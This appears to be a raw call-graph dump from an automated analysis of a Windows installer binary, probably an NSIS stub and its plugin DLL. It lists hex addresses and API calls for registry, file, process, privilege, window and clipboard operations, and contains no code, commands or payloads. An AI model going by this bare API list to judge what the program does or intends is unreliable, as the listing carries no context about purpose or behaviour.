4984->4985 4986 4060bb 17 API calls 4985->4986 4987 404a06 4986->4987 4988 4060bb 17 API calls 4987->4988 4989 404a1c lstrlenA wsprintfA SetDlgItemTextA 4988->4989 4989->4959 4990->4967 4992 404531 4991->4992 4993 404536 SendMessageA 4991->4993 4992->4993 4993->4969 4995 404262 4994->4995 4996 4041d9 GetWindowLongA 4994->4996 4996->4995 4997 4041ea 4996->4997 4998 4041f9 GetSysColor 4997->4998 4999 4041fc 4997->4999 4998->4999 5000 404202 SetTextColor 4999->5000 5001 40420c SetBkMode 4999->5001 5000->5001 5002 404224 GetSysColor 5001->5002 5003 40422a 5001->5003 5002->5003 5004 404231 SetBkColor 5003->5004 5005 40423b 5003->5005 5004->5005 5005->4995 5006 404255 CreateBrushIndirect 5005->5006 5007 40424e DeleteObject 5005->5007 5006->4995 5007->5006 5008 4020cb 5009 402ac1 17 API calls 5008->5009 5010 4020d2 5009->5010 5011 402ac1 17 API calls 5010->5011 5012 4020dc 5011->5012 5013 402ac1 17 API calls 5012->5013 5014 4020e6 5013->5014 5015 402ac1 17 API calls 5014->5015 5016 4020f0 5015->5016 5017 402ac1 17 API calls 5016->5017 5018 4020fa 5017->5018 5019 40213c CoCreateInstance 5018->5019 5020 402ac1 17 API calls 5018->5020 5023 40215b 5019->5023 5025 402206 5019->5025 5020->5019 5021 401423 24 API calls 5022 40223c 5021->5022 5024 4021e6 MultiByteToWideChar 5023->5024 5023->5025 5024->5025 5025->5021 5025->5022 5026 1000180d 5027 10001830 5026->5027 5028 10001860 GlobalFree 5027->5028 5029 10001872 5027->5029 5028->5029 5030 10001266 2 API calls 5029->5030 5031 100019e3 GlobalFree GlobalFree 5030->5031 5032 4026ce 5033 4026d4 5032->5033 5034 4026d8 FindNextFileA 5033->5034 5037 4026ea 5033->5037 5035 402729 5034->5035 5034->5037 5038 406099 lstrcpynA 5035->5038 5038->5037 4546 4023d0 4547 402ac1 17 API calls 4546->4547 4548 4023e2 4547->4548 4549 402ac1 17 API calls 4548->4549 4550 4023ec 4549->4550 4563 402b51 4550->4563 4553 402ac1 17 API calls 4558 40241a lstrlenA 4553->4558 4554 402421 4555 40242d 4554->4555 4556 402a9f 17 API calls 4554->4556 4557 40244c RegSetValueExA 4555->4557 4559 40303e 44 API calls 4555->4559 4556->4555 4560 402462 RegCloseKey 4557->4560 4558->4554 4559->4557 4562 402716 4560->4562 4564 402b6c 4563->4564 4567 405f4d 4564->4567 4568 405f5c 4567->4568 4569 4023fc 4568->4569 4570 405f67 RegCreateKeyExA 4568->4570 4569->4553 4569->4554 4569->4562 4570->4569 5039 401cd4 5040 402a9f 17 API calls 5039->5040 5041 401cda IsWindow 5040->5041 5042 401a0e 5041->5042 5043 4014d6 5044 402a9f 17 API calls 5043->5044 5045 4014dc Sleep 5044->5045 5047 402951 5045->5047 4587 401759 4588 402ac1 17 API calls 4587->4588 4589 401760 4588->4589 4590 401786 4589->4590 4591 40177e 4589->4591 4628 406099 lstrcpynA 4590->4628 4627 406099 lstrcpynA 4591->4627 4594 401784 4597 406303 5 API calls 4594->4597 4595 401791 4596 405a31 3 API calls 4595->4596 4598 401797 lstrcatA 4596->4598 4611 4017a3 4597->4611 4598->4594 4599 40639c 2 API calls 4599->4611 4600 4017e4 4601 405c0d 2 API calls 4600->4601 4601->4611 4603 4017ba CompareFileTime 4603->4611 4604 40187e 4605 4051c0 24 API calls 4604->4605 4607 401888 4605->4607 4606 406099 lstrcpynA 4606->4611 4609 40303e 44 API calls 4607->4609 4608 4051c0 24 API calls 4615 40186a 4608->4615 4610 40189b 4609->4610 4612 4018af SetFileTime 4610->4612 4614 4018c1 CloseHandle 4610->4614 4611->4599 4611->4600 4611->4603 4611->4604 4611->4606 4613 4060bb 17 API calls 4611->4613 4621 4057b5 MessageBoxIndirectA 4611->4621 4625 401855 4611->4625 4626 405c32 GetFileAttributesA CreateFileA 4611->4626 4612->4614 4613->4611 4614->4615 4616 4018d2 4614->4616 4617 4018d7 4616->4617 4618 4018ea 4616->4618 4619 4060bb 17 API calls 4617->4619 4620 4060bb 17 API calls 4618->4620 4622 4018df lstrcatA 4619->4622 4623 4018f2 4620->4623 4621->4611 4622->4623 4624 4057b5 MessageBoxIndirectA 4623->4624 4624->4615 4625->4608 4625->4615 4626->4611 4627->4594 4628->4595 5048 401659 5049 402ac1 17 API calls 5048->5049 5050 40165f 5049->5050 5051 40639c 2 API calls 5050->5051 5052 401665 5051->5052 5053 401959 5054 402a9f 17 API calls 5053->5054 5055 401960 5054->5055 5056 402a9f 17 API calls 5055->5056 5057 40196d 5056->5057 5058 402ac1 17 API calls 5057->5058 5059 401984 lstrlenA 5058->5059 5061 401994 5059->5061 5060 4019d4 5061->5060 5065 406099 lstrcpynA 5061->5065 5063 4019c4 5063->5060 5064 4019c9 lstrlenA 5063->5064 5064->5060 5065->5063 5066 1000161a 5067 10001649 5066->5067 5068 10001a5d 18 API calls 5067->5068 5069 10001650 5068->5069 5070 10001663 5069->5070 5071 10001657 5069->5071 5073 1000168a 5070->5073 5074 1000166d 5070->5074 5072 10001266 2 API calls 5071->5072 5082 10001661 5072->5082 5076 10001690 5073->5076 5077 100016b4 5073->5077 5075 100014e2 3 API calls 5074->5075 5080 10001672 5075->5080 5078 10001559 3 API calls 5076->5078 5079 100014e2 3 API calls 5077->5079 5081 10001695 5078->5081 5079->5082 5083 10001559 3 API calls 5080->5083 5084 10001266 2 API calls 5081->5084 5085 10001678 5083->5085 5086 1000169b GlobalFree 5084->5086 5087 10001266 2 API calls 5085->5087 5086->5082 5088 100016af GlobalFree 5086->5088 5089 1000167e GlobalFree 5087->5089 5088->5082 5089->5082 5097 401f5b 5098 402ac1 17 API calls 5097->5098 5099 401f62 5098->5099 5100 406431 5 API calls 5099->5100 5101 401f71 5100->5101 5102 401ff1 5101->5102 5103 401f89 GlobalAlloc 5101->5103 5103->5102 5104 401f9d 5103->5104 5105 406431 5 API calls 5104->5105 5106 401fa4 5105->5106 5107 406431 5 API calls 5106->5107 5108 401fae 5107->5108 5108->5102 5112 405ff7 wsprintfA 5108->5112 5110 401fe5 5113 405ff7 wsprintfA 5110->5113 5112->5110 5113->5102 5114 40255b 5115 402ac1 17 API calls 5114->5115 5116 402562 5115->5116 5119 405c32 GetFileAttributesA CreateFileA 5116->5119 5118 40256e 5119->5118 5127 401b5d 5128 401bae 5127->5128 5133 401b6a 5127->5133 5129 401bb2 5128->5129 5130 401bd7 GlobalAlloc 5128->5130 5143 4022e1 5129->5143 5148 406099 lstrcpynA 5129->5148 5132 4060bb 17 API calls 5130->5132 5131 4060bb 17 API calls 5135 4022db 5131->5135 5136 401bf2 5132->5136 5133->5136 5137 401b81 5133->5137 5141 4057b5 MessageBoxIndirectA 5135->5141 5136->5131 5136->5143 5146 406099 lstrcpynA 5137->5146 5138 401bc4 GlobalFree 5138->5143 5140 401b90 5147 406099 lstrcpynA 5140->5147 5141->5143 5144 401b9f 5149 406099 lstrcpynA 5144->5149 5146->5140 5147->5144 5148->5138 5149->5143 5150 401a5e 5151 402a9f 17 API calls 5150->5151 5152 401a64 5151->5152 5153 402a9f 17 API calls 5152->5153 5154 401a0e 5153->5154 4840 4024df 4841 402b01 17 API calls 4840->4841 4842 4024e9 4841->4842 4843 402a9f 17 API calls 4842->4843 4844 4024f2 4843->4844 4845 402500 4844->4845 4846 402716 4844->4846 4847 402519 RegEnumValueA 4845->4847 4848 40250d RegEnumKeyA 4845->4848 4849 40252e 4847->4849 4850 402535 RegCloseKey 4847->4850 4848->4850 4849->4850 4850->4846 5155 402c61 5156 402c70 SetTimer 5155->5156 5157 402c89 5155->5157 5156->5157 5158 402cd7 5157->5158 5159 402cdd MulDiv 5157->5159 5160 402c97 wsprintfA SetWindowTextA SetDlgItemTextA 5159->5160 5160->5158 5169 401563 5170 4028f9 5169->5170 5173 405ff7 wsprintfA 5170->5173 5172 4028fe 5173->5172 5174 40166a 5175 402ac1 17 API calls 5174->5175 5176 401671 5175->5176 5177 402ac1 17 API calls 5176->5177 5178 40167a 5177->5178 5179 402ac1 17 API calls 5178->5179 5180 401683 MoveFileA 5179->5180 5181 401696 5180->5181 5182 40168f 5180->5182 5183 40639c 2 API calls 5181->5183 5186 40223c 5181->5186 5184 401423 24 API calls 5182->5184 5185 4016a5 5183->5185 5184->5186 5185->5186 5187 405e78 36 API calls 5185->5187 5187->5182 4062 40246d 4073 402b01 4062->4073 4065 402ac1 17 API calls 4066 402480 4065->4066 4067 40248a RegQueryValueExA 4066->4067 4069 402716 4066->4069 4068 4024aa 4067->4068 4072 4024b0 RegCloseKey 4067->4072 4068->4072 4078 405ff7 wsprintfA 4068->4078 4072->4069 4074 402ac1 17 API calls 4073->4074 4075 402b18 4074->4075 4076 405f1f RegOpenKeyExA 4075->4076 4077 402477 4076->4077 4077->4065 4078->4072 5188 4019ed 5189 402ac1 17 API calls 5188->5189 5190 4019f4 5189->5190 5191 402ac1 17 API calls 5190->5191 5192 4019fd 5191->5192 5193 401a04 lstrcmpiA 5192->5193 5194 401a16 lstrcmpA 5192->5194 5195 401a0a 5193->5195 5194->5195 5196 40426e lstrcpynA lstrlenA 5197 40156f 5198 401586 5197->5198 5199 40157f ShowWindow 5197->5199 5200 402951 5198->5200 5201 401594 ShowWindow 5198->5201 5199->5198 5201->5200 5209 100015b3 5210 100014bb GlobalFree 5209->5210 5212 100015cb 5210->5212 5211 10001611 GlobalFree 5212->5211 5213 100015e6 5212->5213 5214 100015fd VirtualFree 5212->5214 5213->5211 5214->5211 5215 4014f4 SetForegroundWindow 5216 402951 5215->5216 5217 401cf5 5218 402a9f 17 API calls 5217->5218 5219 401cfc 5218->5219 5220 402a9f 17 API calls 5219->5220 5221 401d08 GetDlgItem 5220->5221 5222 402577 5221->5222 4577 4022f6 4578 4022fe 4577->4578 4581 402304 4577->4581 4579 402ac1 17 API calls 4578->4579 4579->4581 4580 402314 4583 402322 4580->4583 4585 402ac1 17 API calls 4580->4585 4581->4580 4582 402ac1 17 API calls 4581->4582 4582->4580 4584 402ac1 17 API calls 4583->4584 4586 40232b WritePrivateProfileStringA 4584->4586 4585->4583 5223 4026f8 5224 402ac1 17 API calls 5223->5224 5225 4026ff FindFirstFileA 5224->5225 5226 402722 5225->5226 5229 402712 5225->5229 5227 402729 5226->5227 5231 405ff7 wsprintfA 5226->5231 5232 406099 lstrcpynA 5227->5232 5231->5227 5232->5229 5233 40237b 5234 402382 5233->5234 5235 4023ad 5233->5235 5236 402b01 17 API calls 5234->5236 5237 402ac1 17 API calls 5235->5237 5240 402389 5236->5240 5238 4023b4 5237->5238 5244 402b7f 5238->5244 5241 4023c1 5240->5241 5242 402ac1 17 API calls 5240->5242 5243 40239a RegDeleteValueA RegCloseKey 5242->5243 5243->5241 5245 402b95 5244->5245 5247 402bab 5245->5247 5248 402bb4 5245->5248 5247->5241 5249 405f1f RegOpenKeyExA 5248->5249 5253 402be2 5249->5253 5250 402c08 RegEnumKeyA 5251 402c1f RegCloseKey 5250->5251 5250->5253 5254 406431 5 API calls 5251->5254 5252 402c40 RegCloseKey 5257 402c33 5252->5257 5253->5250 5253->5251 5253->5252 5255 402bb4 6 API calls 5253->5255 5253->5257 5256 402c2f 5254->5256 5255->5253 5256->5257 5258 402c4e RegDeleteKeyA 5256->5258 5257->5247 5258->5257 4659 401ffd 4660 4020bd 4659->4660 4661 40200f 4659->4661 4663 401423 24 API calls 4660->4663 4662 402ac1 17 API calls 4661->4662 4664 402016 4662->4664 4669 40223c 4663->4669 4665 402ac1 17 API calls 4664->4665 4666 40201f 4665->4666 4667 402034 LoadLibraryExA 4666->4667 4668 402027 GetModuleHandleA 4666->4668 4667->4660 4670 402044 GetProcAddress 4667->4670 4668->4667 4668->4670 4671 402090 4670->4671 4672 402053 4670->4672 4675 4051c0 24 API calls 4671->4675 4673 402072 4672->4673 4674 40205b 4672->4674 4680 100016bd 4673->4680 4676 401423 24 API calls 4674->4676 4677 402063 4675->4677 4676->4677 4677->4669 4678 4020b1 FreeLibrary 4677->4678 4678->4669 4681 100016ed 4680->4681 4722 10001a5d 4681->4722 4683 100016f4 4684 1000180a 4683->4684 4685 10001705 4683->4685 4686 1000170c 4683->4686 4684->4677 4770 100021b0 4685->4770 4754 100021fa 4686->4754 4691 10001770 4697 100017b2 4691->4697 4698 10001776 4691->4698 4692 10001752 4783 100023d8 4692->4783 4693 10001722 4696 10001728 4693->4696 4700 10001733 4693->4700 4694 1000173b 4706 10001731 4694->4706 4780 10002a9f 4694->4780 4696->4706 4764 100027e4 4696->4764 4704 100023d8 11 API calls 4697->4704 4702 10001559 3 API calls 4698->4702 4699 10001758 4794 10001559 4699->4794 4774 10002587 4700->4774 4708 1000178c 4702->4708 4712 100017a4 4704->4712 4706->4691 4706->4692 4711 100023d8 11 API calls 4708->4711 4710 10001739 4710->4706 4711->4712 4721 100017f9 4712->4721 4805 1000239e 4712->4805 4716 10001803 GlobalFree 4716->4684 4718 100017e5 4718->4721 4809 100014e2 wsprintfA 4718->4809 4719 100017de FreeLibrary 4719->4718 4721->4684 4721->4716 4812 10001215 GlobalAlloc 4722->4812 4724 10001a81 4813 10001215 GlobalAlloc 4724->4813 4726 10001cbb GlobalFree GlobalFree GlobalFree 4727 10001cd8 4726->4727 4743 10001d22 4726->4743 4728 1000201a 4727->4728 4735 10001ced 4727->4735 4727->4743 4730 1000203c GetModuleHandleA 4728->4730 4728->4743 4729 10001b60 GlobalAlloc 4742 10001a8c 4729->4742 4733 10002062 4730->4733 4734 1000204d LoadLibraryA 4730->4734 4731 10001bab lstrcpyA 4736 10001bb5 lstrcpyA 4731->4736 4732 10001bc9 GlobalFree 4732->4742 4820 100015a4 GetProcAddress 4733->4820 4734->4733 4734->4743 4735->4743 4816 10001224 4735->4816 4736->4742 4738 100020b3 4739 100020c0 lstrlenA 4738->4739 4738->4743 4821 100015a4 GetProcAddress 4739->4821 4741 10001f7a 4741->4743 4747 10001fbe lstrcpyA 4741->4747 4742->4726 4742->4729 4742->4731 4742->4732 4742->4736 4742->4741 4742->4743 4748 10001e75 GlobalFree 4742->4748 4750 10001224 2 API calls 4742->4750 4752 10001c07 4742->4752 4819 10001215 GlobalAlloc 4742->4819 4743->4683 4744 10002074 4744->4738 4753 1000209d GetProcAddress 4744->4753 4747->4743 4748->4742 4750->4742 4751 100020d9 4751->4743 4752->4742 4814 10001534 GlobalSize GlobalAlloc 4752->4814 4753->4738 4756 10002212 4754->4756 4755 10001224 GlobalAlloc lstrcpynA 4755->4756 4756->4755 4758 10002347 GlobalFree 4756->4758 4760 100022bb GlobalAlloc MultiByteToWideChar 4756->4760 4762 10002306 4756->4762 4823 100012ad 4756->4823 4758->4756 4759 10001712 4758->4759 4759->4693 4759->4694 4759->4706 4761 100022e5 GlobalAlloc CLSIDFromString GlobalFree 4760->4761 4760->4762 4761->4758 4762->4758 4827 1000251b 4762->4827 4766 100027f6 4764->4766 4765 1000289b EnumWindows 4767 100028b9 4765->4767 4766->4765 4768 100029b5 4767->4768 4769 100029aa GetLastError 4767->4769 4768->4706 4769->4768 4771 100021c0 4770->4771 4772 1000170b 4770->4772 4771->4772 4773 100021d2 GlobalAlloc 4771->4773 4772->4686 4773->4771 4778 100025a3 4774->4778 4775 100025f4 GlobalAlloc 4779 10002616 4775->4779 4776 10002607 4777 1000260c GlobalSize 4776->4777 4776->4779 4777->4779 4778->4775 4778->4776 4779->4710 4781 10002aaa 4780->4781 4782 10002aea GlobalFree 4781->4782 4830 10001215 GlobalAlloc 4783->4830 4785 10002438 lstrcpynA 4791 100023e4 4785->4791 4786 10002449 StringFromGUID2 WideCharToMultiByte 4786->4791 4787 1000246d WideCharToMultiByte 4787->4791 4788 1000248e wsprintfA 4788->4791 4789 100024b2 GlobalFree 4789->4791 4790 100024ec GlobalFree 4790->4699 4791->4785 4791->4786 4791->4787 4791->4788 4791->4789 4791->4790 4792 10001266 2 API calls 4791->4792 4831 100012d1 4791->4831 4792->4791 4835 10001215 GlobalAlloc 4794->4835 4796 1000155f 4797 1000156c lstrcpyA 4796->4797 4799 10001586 4796->4799 4800 100015a0 4797->4800 4799->4800 4801 1000158b wsprintfA 4799->4801 4802 10001266 4800->4802 4801->4800 4803 100012a8 GlobalFree 4802->4803 4804 1000126f GlobalAlloc lstrcpynA 4802->4804 4803->4712 4804->4803 4806 100017c5 4805->4806 4807 100023ac 4805->4807 4806->4718 4806->4719 4807->4806 4808 100023c5 GlobalFree 4807->4808 4808->4807 4810 10001266 2 API calls 4809->4810 4811 10001503 4810->4811 4811->4721 4812->4724 4813->4742 4815 10001552 4814->4815 4815->4752 4822 10001215 GlobalAlloc 4816->4822 4818 10001233 lstrcpynA 4818->4743 4819->4742 4820->4744 4821->4751 4822->4818 4824 100012b4 4823->4824 4825 10001224 2 API calls 4824->4825 4826 100012cf 4825->4826 4826->4756 4828 10002529 VirtualAlloc 4827->4828 4829 1000257f 4827->4829 4828->4829 4829->4762 4830->4791 4832 100012f9 4831->4832 4833 100012da 4831->4833 4832->4791 4833->4832 4834 100012e0 lstrcpyA 4833->4834 4834->4832 4835->4796 5259 1000103d 5260 1000101b 5 API calls 5259->5260 5261 10001056 5260->5261 5262 40257d 5263 402582 5262->5263 5264 402596 5262->5264 5265 402a9f 17 API calls 5263->5265 5266 402ac1 17 API calls 5264->5266 5268 40258b 5265->5268 5267 40259d lstrlenA 5266->5267 5267->5268 5269 4025bf 5268->5269 5270 405cd9 WriteFile 5268->5270 5270->5269 5271 4018fd 5272 401934 5271->5272 5273 402ac1 17 API calls 5272->5273 5274 401939 5273->5274 5275 405861 67 API calls 5274->5275 5276 401942 5275->5276 5277 4052fe 5278 405320 GetDlgItem GetDlgItem GetDlgItem 5277->5278 5279 4054a9 5277->5279 5322 40418f SendMessageA 5278->5322 5281 4054b1 GetDlgItem CreateThread CloseHandle 5279->5281 5282 4054d9 5279->5282 5281->5282 5284 405528 5282->5284 5285 4054ef ShowWindow ShowWindow 5282->5285 5287 405507 5282->5287 5283 405390 5289 405397 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5283->5289 5288 4041c1 8 API calls 5284->5288 5324 40418f SendMessageA 5285->5324 5286 405562 5286->5284 5299 40556f SendMessageA 5286->5299 5287->5286 5291 405517 5287->5291 5292 40553b ShowWindow 5287->5292 5294 405534 5288->5294 5297 405405 5289->5297 5298 4053e9 SendMessageA SendMessageA 5289->5298 5325 404133 5291->5325 5295 40555b 5292->5295 5296 40554d 5292->5296 5301 404133 SendMessageA 5295->5301 5300 4051c0 24 API calls 5296->5300 5302 405418 5297->5302 5303 40540a SendMessageA 5297->5303 5298->5297 5299->5294 5304 405588 CreatePopupMenu 5299->5304 5300->5295 5301->5286 5306 40415a 18 API calls 5302->5306 5303->5302 5305 4060bb 17 API calls 5304->5305 5307 405598 AppendMenuA 5305->5307 5308 405428 5306->5308 5311 4055b6 GetWindowRect 5307->5311 5312 4055c9 TrackPopupMenu 5307->5312 5309 405431 ShowWindow 5308->5309 5310 405465 GetDlgItem SendMessageA 5308->5310 5313 405454 5309->5313 5314 405447 ShowWindow 5309->5314 5310->5294 5316 40548c SendMessageA SendMessageA 5310->5316 5311->5312 5312->5294 5315 4055e5 5312->5315 5323 40418f SendMessageA 5313->5323 5314->5313 5317 405604 SendMessageA 5315->5317 5316->5294 5317->5317 5318 405621 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5317->5318 5320 405643 SendMessageA 5318->5320 5320->5320 5321 405665 GlobalUnlock SetClipboardData CloseClipboard 5320->5321 5321->5294 5322->5283 5323->5310 5324->5287 5326 404140 SendMessageA 5325->5326 5327 40413a 5325->5327 5326->5284 5327->5326 5328 100029bf 5329 100029d7 5328->5329 5330 10001534 2 API calls 5329->5330 5331 100029f2 5330->5331 5332 401000 5333 401037 BeginPaint GetClientRect 5332->5333 5334 40100c DefWindowProcA 5332->5334 5336 4010f3 5333->5336 5337 401179 5334->5337 5338 401073 CreateBrushIndirect FillRect DeleteObject 5336->5338 5339 4010fc 5336->5339 5338->5336 5340 401102 CreateFontIndirectA 5339->5340 5341 401167 EndPaint 5339->5341 5340->5341 5342 401112 6 API calls 5340->5342 5341->5337 5342->5341 5343 401900 5344 402ac1 17 API calls 5343->5344 5345 401907 5344->5345 5346 4057b5 MessageBoxIndirectA 5345->5346 5347 401910 5346->5347 3973 402682 3974 402689 3973->3974 3976 4028fe 3973->3976 3981 402a9f 3974->3981 3977 402690 3978 40269f SetFilePointer 3977->3978 3978->3976 3979 4026af 3978->3979 3984 405ff7 wsprintfA 3979->3984 3985 4060bb 3981->3985 3983 402ab4 3983->3977 3984->3976 3986 4060c8 3985->3986 3987 4062ea 3986->3987 3990 4062c4 lstrlenA 3986->3990 3991 4060bb 10 API calls 3986->3991 3994 4061e0 GetSystemDirectoryA 3986->3994 3996 4061f3 GetWindowsDirectoryA 3986->3996 3998 4060bb 10 API calls 3986->3998 3999 40626d lstrcatA 3986->3999 4000 406227 SHGetSpecialFolderLocation 3986->4000 4002 405f80 3986->4002 4007 406303 3986->4007 4016 405ff7 wsprintfA 3986->4016 4017 406099 lstrcpynA 3986->4017 3988 4062ff 3987->3988 4018 406099 lstrcpynA 3987->4018 3988->3983 3990->3986 3991->3990 3994->3986 3996->3986 3998->3986 3999->3986 4000->3986 4001 40623f SHGetPathFromIDListA CoTaskMemFree 4000->4001 4001->3986 4019 405f1f 4002->4019 4005 405fb4 RegQueryValueExA RegCloseKey 4006 405fe3 4005->4006 4006->3986 4008 40630f 4007->4008 4010 40636c CharNextA 4008->4010 4012 406377 4008->4012 4014 40635a CharNextA 4008->4014 4015 406367 CharNextA 4008->4015 4023 405a5c 4008->4023 4009 40637b CharPrevA 4009->4012 4010->4008 4010->4012 4012->4009 4013 406396 4012->4013 4013->3986 4014->4008 4015->4010 4016->3986 4017->3986 4018->3988 4020 405f2e 4019->4020 4021 405f32 4020->4021 4022 405f37 RegOpenKeyExA 4020->4022 4021->4005 4021->4006 4022->4021 4024 405a62 4023->4024 4025 405a75 4024->4025 4026 405a68 CharNextA 4024->4026 4025->4008 4026->4024 5348 401502 5349 40150a 5348->5349 5351 40151d 5348->5351 5350 402a9f 17 API calls 5349->5350 5350->5351 5352 404583 5353 404593 5352->5353 5354 4045b9 5352->5354 5356 40415a 18 API calls 5353->5356 5355 4041c1 8 API calls 5354->5355 5357 4045c5 5355->5357 5358 4045a0 SetDlgItemTextA 5356->5358 5358->5354 5359 401c04 5360 402a9f 17 API calls 5359->5360 5361 401c0b 5360->5361 5362 402a9f 17 API calls 5361->5362 5363 401c18 5362->5363 5364 402ac1 17 API calls 5363->5364 5365 401c2d 5363->5365 5364->5365 5366 402ac1 17 API calls 5365->5366 5370 401c3d 5365->5370 5366->5370 5367 401c94 5369 402ac1 17 API calls 5367->5369 5368 401c48 5371 402a9f 17 API calls 5368->5371 5372 401c99 5369->5372 5370->5367 5370->5368 5373 401c4d 5371->5373 5374 402ac1 17 API calls 5372->5374 5375 402a9f 17 API calls 5373->5375 5376 401ca2 FindWindowExA 5374->5376 5377 401c59 5375->5377 5380 401cc0 5376->5380 5378 401c84 SendMessageA 5377->5378 5379 401c66 SendMessageTimeoutA 5377->5379 5378->5380 5379->5380 5381 403c86 5382 403dd9 5381->5382 5383 403c9e 5381->5383 5385 403e2a 5382->5385 5386 403dea GetDlgItem GetDlgItem 5382->5386 5383->5382 5384 403caa 5383->5384 5387 403cb5 SetWindowPos 5384->5387 5388 403cc8 5384->5388 5390 403e84 5385->5390 5395 401389 2 API calls 5385->5395 5389 40415a 18 API calls 5386->5389 5387->5388 5392 403ce5 5388->5392 5393 403ccd ShowWindow 5388->5393 5394 403e14 SetClassLongA 5389->5394 5391 4041a6 SendMessageA 5390->5391 5396 403dd4 5390->5396 5418 403e96 5391->5418 5397 403d07 5392->5397 5398 403ced DestroyWindow 5392->5398 5393->5392 5399 40140b 2 API calls 5394->5399 5400 403e5c 5395->5400 5401 403d0c SetWindowLongA 5397->5401 5402 403d1d 5397->5402 5449 4040e3 5398->5449 5399->5385 5400->5390 5405 403e60 SendMessageA 5400->5405 5401->5396 5403 403d94 5402->5403 5404 403d29 GetDlgItem 5402->5404 5410 4041c1 8 API calls 5403->5410 5408 403d59 5404->5408 5409 403d3c SendMessageA IsWindowEnabled 5404->5409 5405->5396 5406 40140b 2 API calls 5406->5418 5407 4040e5 DestroyWindow EndDialog 5407->5449 5413 403d66 5408->5413 5414 403dad SendMessageA 5408->5414 5415 403d79 5408->5415 5423 403d5e 5408->5423 5409->5396 5409->5408 5410->5396 5411 404114 ShowWindow 5411->5396 5412 4060bb 17 API calls 5412->5418 5413->5414 5413->5423 5414->5403 5419 403d81 5415->5419 5420 403d96 5415->5420 5416 404133 SendMessageA 5416->5403 5417 40415a 18 API calls 5417->5418 5418->5396 5418->5406 5418->5407 5418->5412 5418->5417 5424 40415a 18 API calls 5418->5424 5440 404025 DestroyWindow 5418->5440 5422 40140b 2 API calls 5419->5422 5421 40140b 2 API calls 5420->5421 5421->5423 5422->5423 5423->5403 5423->5416 5425 403f11 GetDlgItem 5424->5425 5426 403f26 5425->5426 5427 403f2e ShowWindow EnableWindow 5425->5427 5426->5427 5450 40417c EnableWindow 5427->5450 5429 403f58 EnableWindow 5434 403f6c 5429->5434 5430 403f71 GetSystemMenu EnableMenuItem SendMessageA 5431 403fa1 SendMessageA 5430->5431 5430->5434 5431->5434 5433 403c67 18 API calls 5433->5434 5434->5430 5434->5433 5451 40418f SendMessageA 5434->5451 5452 406099 lstrcpynA 5434->5452 5436 403fd0 lstrlenA 5437 4060bb 17 API calls 5436->5437 5438 403fe1 SetWindowTextA 5437->5438 5439 401389 2 API calls 5438->5439 5439->5418 5441 40403f CreateDialogParamA 5440->5441 5440->5449 5442 404072 5441->5442 5441->5449 5443 40415a 18 API calls 5442->5443 5444 40407d GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5443->5444 5445 401389 2 API calls 5444->5445 5446 4040c3 5445->5446 5446->5396 5447 4040cb ShowWindow 5446->5447 5448 4041a6 SendMessageA 5447->5448 5448->5449 5449->5396 5449->5411 5450->5429 5451->5434 5452->5436 4058 401389 4060 401390 4058->4060 4059 4013fe 4060->4059 4061 4013cb MulDiv SendMessageA 4060->4061 4061->4060 4079 40330d SetErrorMode GetVersion 4080 40334e 4079->4080 4081 403354 4079->4081 4082 406431 5 API calls 4080->4082 4170 4063c3 GetSystemDirectoryA 4081->4170 4082->4081 4084 40336a lstrlenA 4084->4081 4085 403379 4084->4085 4173 406431 GetModuleHandleA 4085->4173 4088 406431 5 API calls 4089 403387 4088->4089 4090 406431 5 API calls 4089->4090 4091 403393 #17 OleInitialize SHGetFileInfoA 4090->4091 4179 406099 lstrcpynA 4091->4179 4094 4033df GetCommandLineA 4180 406099 lstrcpynA 4094->4180 4096 4033f1 GetModuleHandleA 4097 403408 4096->4097 4098 405a5c CharNextA 4097->4098 4099 40341c CharNextA 4098->4099 4108 40342c 4099->4108 4100 4034f6 4101 403509 GetTempPathA 4100->4101 4181 4032dc 4101->4181 4103 403521 4105 403525 GetWindowsDirectoryA lstrcatA 4103->4105 4106 40357b DeleteFileA 4103->4106 4104 405a5c CharNextA 4104->4108 4109 4032dc 12 API calls 4105->4109 4191 402d98 GetTickCount GetModuleFileNameA 4106->4191 4108->4100 4108->4104 4112 4034f8 4108->4112 4111 403541 4109->4111 4110 40358f 4113 403625 4110->4113 4116 403615 4110->4116 4120 405a5c CharNextA 4110->4120 4111->4106 4115 403545 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4111->4115 4278 406099 lstrcpynA 4112->4278 4295 4037f7 4113->4295 4118 4032dc 12 API calls 4115->4118 4221 4038e9 4116->4221 4122 403573 4118->4122 4123 4035aa 4120->4123 4122->4106 4122->4113 4130 4035f0 4123->4130 4131 403655 4123->4131 4124 40375d 4127 403765 GetCurrentProcess OpenProcessToken 4124->4127 4128 4037df ExitProcess 4124->4128 4125 40363f 4304 4057b5 4125->4304 4133 4037b0 4127->4133 4134 403780 LookupPrivilegeValueA AdjustTokenPrivileges 4127->4134 4279 405b1f 4130->4279 4308 405720 4131->4308 4135 406431 5 API calls 4133->4135 4134->4133 4138 4037b7 4135->4138 4141 4037cc ExitWindowsEx 4138->4141 4145 4037d8 4138->4145 4141->4128 4141->4145 4142 403676 lstrcatA lstrcmpiA 4142->4113 4144 403692 4142->4144 4143 40366b lstrcatA 4143->4142 4148 403697 4144->4148 4149 40369e 4144->4149 4328 40140b 4145->4328 4147 40360a 4294 406099 lstrcpynA 4147->4294 4311 405686 CreateDirectoryA 4148->4311 4316 405703 CreateDirectoryA 4149->4316 4155 4036a3 SetCurrentDirectoryA 4156 4036b2 4155->4156 4157 4036bd 4155->4157 4319 406099 lstrcpynA 4156->4319 4320 406099 lstrcpynA 4157->4320 4160 4060bb 17 API calls 4161 4036fc DeleteFileA 4160->4161 4162 403709 CopyFileA 4161->4162 4167 4036cb 4161->4167 4162->4167 4163 403751 4165 405e78 36 API calls 4163->4165 4165->4113 4166 4060bb 17 API calls 4166->4167 4167->4160 4167->4163 4167->4166 4169 40373d CloseHandle 4167->4169 4321 405e78 MoveFileExA 4167->4321 4325 405738 CreateProcessA 4167->4325 4169->4167 4171 4063e5 wsprintfA LoadLibraryExA 4170->4171 4171->4084 4174 406457 GetProcAddress 4173->4174 4175 40644d 4173->4175 4177 403380 4174->4177 4176 4063c3 3 API calls 4175->4176 4178 406453 4176->4178 4177->4088 4178->4174 4178->4177 4179->4094 4180->4096 4182 406303 5 API calls 4181->4182 4184 4032e8 4182->4184 4183 4032f2 4183->4103 4184->4183 4331 405a31 lstrlenA CharPrevA 4184->4331 4187 405703 2 API calls 4188 403300 4187->4188 